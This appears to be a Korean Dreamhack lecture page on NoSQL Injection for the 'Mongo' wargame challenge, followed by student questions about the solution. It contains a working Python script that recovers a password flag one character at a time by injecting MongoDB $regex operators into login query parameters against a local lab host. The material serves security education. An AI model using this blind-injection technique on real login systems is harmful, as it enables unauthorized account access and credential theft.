드림핵 워게임 문제 중 Mongo를 풀이하기 위해서는 NoSQL Injection에 대한 이해가 필요합니다.
워게임 문제를 풀어보면서 NoSQL Injection에 대한 이해를 높여봅니다.
강의 설명
강의 목표
문제 풀이를 통한 NoSQL Injection의 이해
이 강의와 관련된 질문들입니다.
3개의 질문
코드
import requests, string
HOST = 'http://localhost'
ALPHANUMERIC = string.digits + string.ascii_letters
SUCCESS = 'admin'
flag = ''
for i in range(32):
for ch in ALPHANUMERIC:
response = requests.get(f'{HOST}/login?uid[$regex]=ad.in&upw[$regex]=D.{{{flag}{ch}')
if response.text == SUCCESS:
flag += ch
break
print(f'FLAG: DH{{{flag}}}')
이 코드는 어따 작성해야 하나요?
그리고 sql은 어디다가 입력해서 하는 공격인가요?
코드를 어따쓰는코든가요
찾아봤는데 파이썬같기도하고 모르겠어요
코드 상 {{만 써주신 이유가 궁급합니다.(}}는 생략하신 이유)
response = requests.get(f'{HOST}/login?uid[$regex]=ad.in&upw[$regex]=D.{{{flag}{ch}') 부분에서 D.{{{flag}{ch} 부분이 출력되면 D.{xxx 나오게 되는데 이때 여는 중괄호만 출력되고 닫는 중괄호는 출력되지 않게 하신 이유가 궁급합니다. ex. D.{{{flag}{ch}}} 의 경우 D.{xxx}형식으로 pw의 형식과 일치하게 됨.
이 강의가 포함된 로드맵
드림핵이 추천하는 강의입니다.
같이 들으면 좋은 강의
